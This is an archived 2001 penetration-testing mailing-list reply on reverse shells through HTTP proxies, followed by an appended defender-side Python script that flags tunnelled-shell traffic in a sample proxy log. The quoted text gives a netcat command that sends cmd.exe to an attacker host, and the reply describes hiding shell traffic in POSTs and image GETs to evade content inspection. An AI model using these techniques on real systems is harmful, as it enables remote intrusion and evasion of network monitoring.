Penetration Testing mailing list archives

RE: Reverse Http Shell Solution


From: Frank Knobbe <FKnobbe () KnobbeITS com>
Date: Thu, 18 Oct 2001 20:55:58 -0500


-----Original Message-----
From: GrandmastrPlague () aol com [mailto:GrandmastrPlague () aol com]
Sent: Thursday, October 18, 2001 2:02 PM

It seems like this question has been asked a million times 
before, but here goes the same old answer again... use netcat 
On attacker machine: 
nc -l -p 80 
On victim machine: 
nc -d -e cmd.exe attacker 80 

Make sure you set up the listening machine first. 


I believe Vinícius meant that there is no way for a straight-through
connection as netcat would establish, but instead the requirement to
send GET requests to the proxy, which will fetch a page for you.
Netcat won't do that. You would have to have a reverse shell that
operates on an HTTP GET and PUT basis.

You could modify netcat to do that. Instead of using TCP/UDP
connections, you can replace that mechanism with HTTP GET and PUT
ways of shuffling data, pumping that back to stdin/stdout. The only
catch is to fetch the data correctly, as some firewalls will do
content inspection. One way to get around that is to pump data with
POSTs to a form as normal, but receive data via GETs from images in
the web page, or just request images à la http://h4x0r/data.gif.

Regards,
Frank

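As an added, defender-side example that is not part of the thread, the following Python script flags the traffic pattern Frank describes (form POSTs interleaved with "image" GETs to one host on a steady beat) in proxy logs; the simplified log format, the host names and the client addresses are all constructed for the example.

```python
"""Flag proxy clients whose traffic looks like an HTTP-tunnelled shell:
a regular cadence of POSTs to one form URL interleaved with GETs of
'images' from the same host, the pattern described in the message above."""
import re
from collections import defaultdict
from statistics import pstdev

# Constructed, simplified proxy log: epoch time, client, method, URL, bytes.
# Hosts and addresses are made up for this example.
SAMPLE_LOG = """\
1003456000.100 10.0.0.5 POST http://h4x0r.example/form.php 312
1003456001.120 10.0.0.5 GET http://h4x0r.example/data.gif 944
1003456002.110 10.0.0.5 POST http://h4x0r.example/form.php 128
1003456003.130 10.0.0.5 GET http://h4x0r.example/data.gif 40
1003456004.100 10.0.0.5 POST http://h4x0r.example/form.php 640
1003456005.090 10.0.0.5 GET http://h4x0r.example/data.gif 1208
1003456010.000 10.0.0.7 GET http://news.example/index.html 20480
1003456040.000 10.0.0.7 GET http://news.example/logo.gif 5120
1003456200.000 10.0.0.7 GET http://news.example/story.html 14000
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (GET|POST|PUT) (\S+) (\d+)$")
IMAGE_RE = re.compile(r"\.(gif|jpe?g|png)$", re.I)

def parse(log):
    """Yield (timestamp, client, method, host, url) for each well-formed line."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, client, method, url, _size = m.groups()
            yield float(ts), client, method, url.split("/")[2], url

def suspicious_clients(log, min_requests=6, max_jitter=0.5):
    """Return {client: host} for pairs showing a regular POST/GET beat."""
    per_pair = defaultdict(list)
    for ts, client, method, host, url in parse(log):
        per_pair[(client, host)].append((ts, method, url))
    hits = {}
    for (client, host), reqs in per_pair.items():
        if len(reqs) < min_requests:
            continue  # too little traffic to judge a cadence
        reqs.sort()
        gaps = [b[0] - a[0] for a, b in zip(reqs, reqs[1:])]
        uploads = sum(1 for _, m, _ in reqs if m in ("POST", "PUT"))
        img_gets = sum(1 for _, m, u in reqs if m == "GET" and IMAGE_RE.search(u))
        # Uploads via form POST plus downloads disguised as images, on a beat.
        if uploads and img_gets and pstdev(gaps) <= max_jitter:
            hits[client] = host
    return hits

if __name__ == "__main__":
    print(suspicious_clients(SAMPLE_LOG))  # {'10.0.0.5': 'h4x0r.example'}
```

Ordinary browsing (client 10.0.0.7) is not flagged: it is sparse, irregular and has no uploads, whereas the tunnelled client keeps a one-second beat with alternating form POSTs and image GETs.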
